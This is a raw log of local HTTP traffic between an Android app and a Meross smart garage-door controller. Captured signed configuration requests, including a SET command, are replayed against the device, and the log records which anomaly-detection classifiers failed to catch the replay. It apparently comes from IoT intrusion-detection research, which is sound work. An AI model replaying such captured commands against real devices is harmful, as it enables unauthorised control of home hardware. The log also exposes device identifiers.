POST /config HTTP/1.1
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 310
Host: 10.13.0.32
Accept-Encoding: gzip
User-Agent: okhttp/3.12.0

{"header":{"from":"http://10.13.0.32/config","messageId":"ee5ac6c371a1126a2254f717de1f2955","method":"GET","namespace":"Appliance.System.All","payloadVersion":1,"sign":"ffc8c9814de539c13dd42e10adfdcc2c","timestamp":1694935999,"triggerSrc":"AndroidLocal","uuid":"2210197269145761070248e1e9abec1b"},"payload":{}}
HTTP/1.1 200 OK
Content-Type: application/json

{"header":{"messageId":"ee5ac6c371a1126a2254f717de1f2955","namespace":"Appliance.System.All","triggerSrc":"AndroidLocal","method":"GETACK","payloadVersion":1,"from":"/appliance/2210197269145761070248e1e9abec1b/publish","timestamp":1694936000,"timestampMs":528,"sign":"31d4f27c99b7eb008e9962217f6acc68"},"payload":{"all":{"system":{"hardware":{"type":"msg100","subType":"us","version":"4.0.0","chipType":"MT7686","uuid":"2210197269145761070248e1e9abec1b","macAddress":"48:e1:e9:ab:ec:1b"},"firmware":{"version":"4.2.6","homekitVersion":"2.0.1","compileTime":"Oct 24 2022 10:28:41","encrypt":1,"wifiMac":"28:e3:47:c2:d9:cc","innerIp":"10.13.0.32","server":"mqtt-us-2.meross.com","port":443,"userId":3094003},"time":{"timestamp":1694936000,"timezone":"Europe/Rome","timeRule":[[1679792400,7200,1],[1698541200,3600,0],[1711846800,7200,1],[1729990800,3600,0],[1743296400,7200,1],[1761440400,3600,0],[1774746000,7200,1],[1792890000,3600,0],[1806195600,7200,1],[1824944400,3600,0],[1837645200,7200,1],[1856394000,3600,0],[1869094800,7200,1],[1887843600,3600,0],[1901149200,7200,1],[1919293200,3600,0],[1932598800,7200,1],[1950742800,3600,0],[1964048400,7200,1],[1982797200,3600,0]]},"online":{"status":1,"bindId":"U8dHQ2wouexxfAA0","who":1}},"digest":{"togglex":[{"channel":0,"onoff":0,"lmTime":0}],"triggerx":[{"channel":0,"id":"1111111111111111","count":1}],"timerx":[],"garageDoor":[{"channel":0,"open":1,"lmTime":
POST /config HTTP/1.1
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 313
Host: 10.13.0.32
Accept-Encoding: gzip
User-Agent: okhttp/3.12.0

{"header":{"from":"http://10.13.0.32/config","messageId":"71102ab67a066689710de76b17c1a010","method":"GET","namespace":"Appliance.System.Online","payloadVersion":1,"sign":"a7e36d412f5b979d9b6c7f76b559d63a","timestamp":1694935999,"triggerSrc":"AndroidLocal","uuid":"2210197269145761070248e1e9abec1b"},"payload":{}}
HTTP/1.1 200 OK
Content-Type: application/json

{"header":{"messageId":"71102ab67a066689710de76b17c1a010","namespace":"Appliance.System.Online","triggerSrc":"AndroidLocal","method":"GETACK","payloadVersion":1,"from":"/appliance/2210197269145761070248e1e9abec1b/publish","timestamp":1694936000,"timestampMs":625,"sign":"8e780bc3516233d7698902a9795c7cc5"},"payload":{"online":{"status":1,"bindId":"U8dHQ2wouexxfAA0","who":1}}}

{"devName":"msg100","devSoftWare":"4.2.6","devHardWare":"4.0.0","ip":"10.13.0.32","port":80,"mac":"48:e1:e9:ab:ec:1b","uuid":"2210197269145761070248e1e9abec1b","deviceType":"msg100","subType":"us"}
{"devName":"msg100","devSoftWare":"4.2.6","devHardWare":"4.0.0","ip":"10.13.0.32","port":80,"mac":"48:e1:e9:ab:ec:1b","uuid":"2210197269145761070248e1e9abec1b","deviceType":"msg100","subType":"us"}
{"devName":"msg100","devSoftWare":"4.2.6","devHardWare":"4.0.0","ip":"10.13.0.32","port":80,"mac":"48:e1:e9:ab:ec:1b","uuid":"2210197269145761070248e1e9abec1b","deviceType":"msg100","subType":"us"}
{"devName":"msg100","devSoftWare":"4.2.6","devHardWare":"4.0.0","ip":"10.13.0.32","port":80,"mac":"48:e1:e9:ab:ec:1b","uuid":"2210197269145761070248e1e9abec1b","deviceType":"msg100","subType":"us"}
POST /config HTTP/1.1
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 317
Host: 10.13.0.32
Accept-Encoding: gzip
User-Agent: okhttp/3.12.0

{"header":{"from":"http://10.13.0.32/config","messageId":"0fefc38615abc459e5c36c715de8402d","method":"GET","namespace":"Appliance.GarageDoor.Config","payloadVersion":1,"sign":"936dd3a3d993f10a634ebabe2b2e5f28","timestamp":1694936007,"triggerSrc":"AndroidLocal","uuid":"2210197269145761070248e1e9abec1b"},"payload":{}}
POST /config HTTP/1.1
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 313
Host: 10.13.0.32
Accept-Encoding: gzip
User-Agent: okhttp/3.12.0

{"header":{"from":"http://10.13.0.32/config","messageId":"810b6178954f854803edcbb2eecc830d","method":"GET","namespace":"Appliance.Digest.TimerX","payloadVersion":1,"sign":"65fcbf77ce94f0a0558f847fd9b9bb67","timestamp":1694936007,"triggerSrc":"AndroidLocal","uuid":"2210197269145761070248e1e9abec1b"},"payload":{}}
POST /config HTTP/1.1
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 314
Host: 10.13.0.32
Accept-Encoding: gzip
User-Agent: okhttp/3.12.0

{"header":{"from":"http://10.13.0.32/config","messageId":"6016ea619c298f17224f26aeb003a34c","method":"GET","namespace":"Appliance.System.DNDMode","payloadVersion":1,"sign":"5795ea553b7e4dabcc693d089a724a15","timestamp":1694936007,"triggerSrc":"AndroidLocal","uuid":"2210197269145761070248e1e9abec1b"},"payload":{}}
HTTP/1.1 200 OK
Content-Type: application/json

{"header":{"messageId":"0fefc38615abc459e5c36c715de8402d","namespace":"Appliance.GarageDoor.Config","triggerSrc":"AndroidLocal","method":"GETACK","payloadVersion":1,"from":"/appliance/2210197269145761070248e1e9abec1b/publish","timestamp":1694936008,"timestampMs":139,"sign":"e95066826ff0b52912d9319f682956f2"},"payload":{"config":{"signalDuration":2000,"buzzerEnable":0,"doorOpenDuration":5000,"doorCloseDuration":5000}}}

POST /config HTTP/1.1
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 317
Host: 10.13.0.32
Accept-Encoding: gzip
User-Agent: okhttp/3.12.0

{"header":{"from":"http://10.13.0.32/config","messageId":"a355dc8d0d02bf601c138e187f90f980","method":"GET","namespace":"Appliance.GarageDoor.Config","payloadVersion":1,"sign":"63c9ca021d9e69768600991c1631a637","timestamp":1694936007,"triggerSrc":"AndroidLocal","uuid":"2210197269145761070248e1e9abec1b"},"payload":{}}
HTTP/1.1 200 OK
Content-Type: application/json

{"header":{"messageId":"810b6178954f854803edcbb2eecc830d","namespace":"Appliance.Digest.TimerX","triggerSrc":"AndroidLocal","method":"GETACK","payloadVersion":1,"from":"/appliance/2210197269145761070248e1e9abec1b/publish","timestamp":1694936008,"timestampMs":150,"sign":"476f0cbcfb6438637e90fb8ca692283d"},"payload":{"digest":[]}}

HTTP/1.1 200 OK
Content-Type: application/json

{"header":{"messageId":"6016ea619c298f17224f26aeb003a34c","namespace":"Appliance.System.DNDMode","triggerSrc":"AndroidLocal","method":"GETACK","payloadVersion":1,"from":"/appliance/2210197269145761070248e1e9abec1b/publish","timestamp":1694936008,"timestampMs":159,"sign":"aa35d2edd5c620e51e564f6bb5229b80"},"payload":{"DNDMode":{"mode":1}}}

HTTP/1.1 200 OK
Content-Type: application/json

{"header":{"messageId":"a355dc8d0d02bf601c138e187f90f980","namespace":"Appliance.GarageDoor.Config","triggerSrc":"AndroidLocal","method":"GETACK","payloadVersion":1,"from":"/appliance/2210197269145761070248e1e9abec1b/publish","timestamp":1694936008,"timestampMs":167,"sign":"a795d2db54a0b506e44fa87e31e1bfd1"},"payload":{"config":{"signalDuration":2000,"buzzerEnable":0,"doorOpenDuration":5000,"doorCloseDuration":5000}}}

POST /config HTTP/1.1
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 315
Host: 10.13.0.32
Accept-Encoding: gzip
User-Agent: okhttp/3.12.0

{"header":{"from":"http://10.13.0.32/config","messageId":"5d0b6750d3472c737b50d0538a530cb4","method":"GET","namespace":"Appliance.Digest.TriggerX","payloadVersion":1,"sign":"f6a5cec54083b82f5dbb410fd75174e8","timestamp":1694936007,"triggerSrc":"AndroidLocal","uuid":"2210197269145761070248e1e9abec1b"},"payload":{}}
HTTP/1.1 200 OK
Content-Type: application/json

{"header":{"messageId":"5d0b6750d3472c737b50d0538a530cb4","namespace":"Appliance.Digest.TriggerX","triggerSrc":"AndroidLocal","method":"GETACK","payloadVersion":1,"from":"/appliance/2210197269145761070248e1e9abec1b/publish","timestamp":1694936008,"timestampMs":255,"sign":"4e579e1e1e76ae86b0f7b7aaa353d7d9"},"payload":{"digest":[{"channel":0,"id":"1111111111111111","count":1}]}}

POST /config HTTP/1.1
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 314
Host: 10.13.0.32
Accept-Encoding: gzip
User-Agent: okhttp/3.12.0

{"header":{"from":"http://10.13.0.32/config","messageId":"aca7a0b3a628b70ca4f847173821e518","method":"GET","namespace":"Appliance.System.Runtime","payloadVersion":1,"sign":"1360c1f2d00a88e0bf368bf54547ac38","timestamp":1694936007,"triggerSrc":"AndroidLocal","uuid":"2210197269145761070248e1e9abec1b"},"payload":{}}
HTTP/1.1 200 OK
Content-Type: application/json

{"header":{"messageId":"aca7a0b3a628b70ca4f847173821e518","namespace":"Appliance.System.Runtime","triggerSrc":"AndroidLocal","method":"GETACK","payloadVersion":1,"from":"/appliance/2210197269145761070248e1e9abec1b/publish","timestamp":1694936008,"timestampMs":902,"sign":"35629499e665668bc2aa9bd4b8a9bae2"},"payload":{"runtime":{"signal":100}}}

POST /config HTTP/1.1
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 334
Host: 10.13.0.32
Accept-Encoding: gzip
User-Agent: okhttp/3.12.0

{"header":{"from":"http://10.13.0.32/config","messageId":"13214c2715535d272ddc8322b92d8562","method":"SET","namespace":"Appliance.System.DNDMode","payloadVersion":1,"sign":"5988104bd6984ab829de9ac725def2c7","timestamp":1694936011,"triggerSrc":"AndroidLocal","uuid":"2210197269145761070248e1e9abec1b"},"payload":{"DNDMode":{"mode":0}}}
HTTP/1.1 200 OK
Content-Type: application/json

{"header":{"messageId":"13214c2715535d272ddc8322b92d8562","namespace":"Appliance.System.DNDMode","triggerSrc":"AndroidLocal","method":"SETACK","payloadVersion":1,"from":"/appliance/2210197269145761070248e1e9abec1b/publish","timestamp":1694936012,"timestampMs":961,"sign":"0ba82fd83445ea8c842391ddf32ea6de"},"payload":{}}

START REPLAY ATTACK
#######################################################################################
sent payload=POST /config HTTP/1.1
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 334
Host: 10.13.0.32
Accept-Encoding: gzip
User-Agent: okhttp/3.12.0

{"header":{"from":"http://10.13.0.32/config","messageId":"13214c2715535d272ddc8322b92d8562","method":"SET","namespace":"Appliance.System.DNDMode","payloadVersion":1,"sign":"5988104bd6984ab829de9ac725def2c7","timestamp":1694936011,"triggerSrc":"AndroidLocal","uuid":"2210197269145761070248e1e9abec1b"},"payload":{"DNDMode":{"mode":0}}}
****************************************************************
received payload=HTTP/1.1 200 OK
Content-Type: application/json

{"header":{"messageId":"13214c2715535d272ddc8322b92d8562","namespace":"Appliance.System.DNDMode","triggerSrc":"AndroidLocal","method":"SETACK","payloadVersion":1,"from":"/appliance/2210197269145761070248e1e9abec1b/publish","timestamp":1694936133,"timestampMs":291,"sign":"8ae287f752dbe71af6f3688bba4b8298"},"payload":{}}

****************************************************************
sent payload=POST /config HTTP/1.1
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 314
Host: 10.13.0.32
Accept-Encoding: gzip
User-Agent: okhttp/3.12.0

{"header":{"from":"http://10.13.0.32/config","messageId":"aca7a0b3a628b70ca4f847173821e518","method":"GET","namespace":"Appliance.System.Runtime","payloadVersion":1,"sign":"1360c1f2d00a88e0bf368bf54547ac38","timestamp":1694936007,"triggerSrc":"AndroidLocal","uuid":"2210197269145761070248e1e9abec1b"},"payload":{}}
****************************************************************
received payload=HTTP/1.1 200 OK
Content-Type: application/json

{"header":{"messageId":"aca7a0b3a628b70ca4f847173821e518","namespace":"Appliance.System.Runtime","triggerSrc":"AndroidLocal","method":"GETACK","payloadVersion":1,"from":"/appliance/2210197269145761070248e1e9abec1b/publish","timestamp":1694936133,"timestampMs":310,"sign":"901347279b883f61de697404bb0f7aa5"},"payload":{"runtime":{"signal":100}}}

****************************************************************
sent payload=POST /config HTTP/1.1
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 315
Host: 10.13.0.32
Accept-Encoding: gzip
User-Agent: okhttp/3.12.0

{"header":{"from":"http://10.13.0.32/config","messageId":"5d0b6750d3472c737b50d0538a530cb4","method":"GET","namespace":"Appliance.Digest.TriggerX","payloadVersion":1,"sign":"f6a5cec54083b82f5dbb410fd75174e8","timestamp":1694936007,"triggerSrc":"AndroidLocal","uuid":"2210197269145761070248e1e9abec1b"},"payload":{}}
****************************************************************
received payload=HTTP/1.1 200 OK
Content-Type: application/json

{"header":{"messageId":"5d0b6750d3472c737b50d0538a530cb4","namespace":"Appliance.Digest.TriggerX","triggerSrc":"AndroidLocal","method":"GETACK","payloadVersion":1,"from":"/appliance/2210197269145761070248e1e9abec1b/publish","timestamp":1694936133,"timestampMs":326,"sign":"f72eea0379927f35a57c5894377ac56e"},"payload":{"digest":[{"channel":0,"id":"1111111111111111","count":1}]}}

****************************************************************
sent payload=POST /config HTTP/1.1
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 317
Host: 10.13.0.32
Accept-Encoding: gzip
User-Agent: okhttp/3.12.0

{"header":{"from":"http://10.13.0.32/config","messageId":"a355dc8d0d02bf601c138e187f90f980","method":"GET","namespace":"Appliance.GarageDoor.Config","payloadVersion":1,"sign":"63c9ca021d9e69768600991c1631a637","timestamp":1694936007,"triggerSrc":"AndroidLocal","uuid":"2210197269145761070248e1e9abec1b"},"payload":{}}
****************************************************************
received payload=HTTP/1.1 200 OK
Content-Type: application/json

{"header":{"messageId":"a355dc8d0d02bf601c138e187f90f980","namespace":"Appliance.GarageDoor.Config","triggerSrc":"AndroidLocal","method":"GETACK","payloadVersion":1,"from":"/appliance/2210197269145761070248e1e9abec1b/publish","timestamp":1694936133,"timestampMs":337,"sign":"f64ce759ee6db1f62c6ba0c90da8af9f"},"payload":{"config":{"signalDuration":2000,"buzzerEnable":0,"doorOpenDuration":5000,"doorCloseDuration":5000}}}

****************************************************************
sent payload=POST /config HTTP/1.1
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 317
Host: 10.13.0.32
Accept-Encoding: gzip
User-Agent: okhttp/3.12.0

{"header":{"from":"http://10.13.0.32/config","messageId":"0fefc38615abc459e5c36c715de8402d","method":"GET","namespace":"Appliance.GarageDoor.Config","payloadVersion":1,"sign":"936dd3a3d993f10a634ebabe2b2e5f28","timestamp":1694936007,"triggerSrc":"AndroidLocal","uuid":"2210197269145761070248e1e9abec1b"},"payload":{}}
****************************************************************
received payload=HTTP/1.1 200 OK
Content-Type: application/json

{"header":{"messageId":"0fefc38615abc459e5c36c715de8402d","namespace":"Appliance.GarageDoor.Config","triggerSrc":"AndroidLocal","method":"GETACK","payloadVersion":1,"from":"/appliance/2210197269145761070248e1e9abec1b/publish","timestamp":1694936133,"timestampMs":354,"sign":"09afa055296bc54bbe7c3eb1b0acd73f"},"payload":{"config":{"signalDuration":2000,"buzzerEnable":0,"doorOpenDuration":5000,"doorCloseDuration":5000}}}

****************************************************************
sent payload=POST /config HTTP/1.1
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 313
Host: 10.13.0.32
Accept-Encoding: gzip
User-Agent: okhttp/3.12.0

{"header":{"from":"http://10.13.0.32/config","messageId":"810b6178954f854803edcbb2eecc830d","method":"GET","namespace":"Appliance.Digest.TimerX","payloadVersion":1,"sign":"65fcbf77ce94f0a0558f847fd9b9bb67","timestamp":1694936007,"triggerSrc":"AndroidLocal","uuid":"2210197269145761070248e1e9abec1b"},"payload":{}}
****************************************************************
received payload=
****************************************************************
sent payload=POST /config HTTP/1.1
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 314
Host: 10.13.0.32
Accept-Encoding: gzip
User-Agent: okhttp/3.12.0

{"header":{"from":"http://10.13.0.32/config","messageId":"6016ea619c298f17224f26aeb003a34c","method":"GET","namespace":"Appliance.System.DNDMode","payloadVersion":1,"sign":"5795ea553b7e4dabcc693d089a724a15","timestamp":1694936007,"triggerSrc":"AndroidLocal","uuid":"2210197269145761070248e1e9abec1b"},"payload":{}}
****************************************************************
received payload=
****************************************************************
sent payload=POST /config HTTP/1.1
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 313
Host: 10.13.0.32
Accept-Encoding: gzip
User-Agent: okhttp/3.12.0

{"header":{"from":"http://10.13.0.32/config","messageId":"71102ab67a066689710de76b17c1a010","method":"GET","namespace":"Appliance.System.Online","payloadVersion":1,"sign":"a7e36d412f5b979d9b6c7f76b559d63a","timestamp":1694935999,"triggerSrc":"AndroidLocal","uuid":"2210197269145761070248e1e9abec1b"},"payload":{}}
****************************************************************
received payload=HTTP/1.1 200 OK
Content-Type: application/json

{"header":{"messageId":"71102ab67a066689710de76b17c1a010","namespace":"Appliance.System.Online","triggerSrc":"AndroidLocal","method":"GETACK","payloadVersion":1,"from":"/appliance/2210197269145761070248e1e9abec1b/publish","timestamp":1694936133,"timestampMs":370,"sign":"a304f19393c17414b73a37f04469a298"},"payload":{"online":{"status":1,"bindId":"U8dHQ2wouexxfAA0","who":1}}}

****************************************************************
sent payload=POST /config HTTP/1.1
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 310
Host: 10.13.0.32
Accept-Encoding: gzip
User-Agent: okhttp/3.12.0

{"header":{"from":"http://10.13.0.32/config","messageId":"ee5ac6c371a1126a2254f717de1f2955","method":"GET","namespace":"Appliance.System.All","payloadVersion":1,"sign":"ffc8c9814de539c13dd42e10adfdcc2c","timestamp":1694935999,"triggerSrc":"AndroidLocal","uuid":"2210197269145761070248e1e9abec1b"},"payload":{}}
****************************************************************
received payload=HTTP/1.1 200 OK
Content-Type: application/json

{"header":{"messageId":"ee5ac6c371a1126a2254f717de1f2955","namespace":"Appliance.System.All","triggerSrc":"AndroidLocal","method":"GETACK","payloadVersion":1,"from":"/appliance/2210197269145761070248e1e9abec1b/publish","timestamp":1694936133,"timestampMs":382,"sign":"c67a4e0eb063e5050e09d7abc777ae03"},"payload":{"all":{"system":{"hardware":{"type":"msg100","subType":"us","version":"4.0.0","chipType":"MT7686","uuid":"2210197269145761070248e1e9abec1b","macAddress":"48:e1:e9:ab:ec:1b"},"firmware":{"version":"4.2.6","homekitVersion":"2.0.1","compileTime":"Oct 24 2022 10:28:41","encrypt":1,"wifiMac":"28:e3:47:c2:d9:cc","innerIp":"10.13.0.32","server":"mqtt-us-2.meross.com","port":443,"userId":3094003},"time":{"timestamp":1694936133,"timezone":"Europe/Rome","timeRule":[[1679792400,7200,1],[1698541200,3600,0],[1711846800,7200,1],[1729990800,3600,0],[1743296400,7200,1],[1761440400,3600,0],[1774746000,7200,1],[1792890000,3600,0],[1806195600,7200,1],[1824944400,3600,0],[1837645200,7200,1],[1856394000,3600,0],[1869094800,7200,1],[1887843600,3600,0],[1901149200,7200,1],[1919293200,3600,0],[1932598800,7200,1],[1950742800,3600,0],[1964048400,7200,1],[1982797200,3600,0]]},"online":{"status":1,"bindId":"U8dHQ2wouexxfAA0","who":1}},"digest":{"togglex":[{"channel":0,"onoff":0,"lmTime":0}],"triggerx":[{"channel":0,"id":"1111111111111111","count":1}],"timerx":[],"garageDoor":[{"channel":0,"open":1,"lmTime":
****************************************************************
REPLAY ATTACK NOT SUCCESSFUL WITH CLF=OneClassSVM(gamma='auto', nu=0.001)
REPLAY ATTACK SUCCESSFUL WITH CLF=IsolationForest(contamination=0.01)
REPLAY ATTACK NOT SUCCESSFUL WITH CLF=EllipticEnvelope(contamination=0.01)
REPLAY ATTACK SUCCESSFUL WITH CLF=LocalOutlierFactor(contamination=0.01, novelty=True)
REPLAY ATTACK SUCCESSFUL WITH CLF=CustomClassifier()
END REPLAY ATTACK
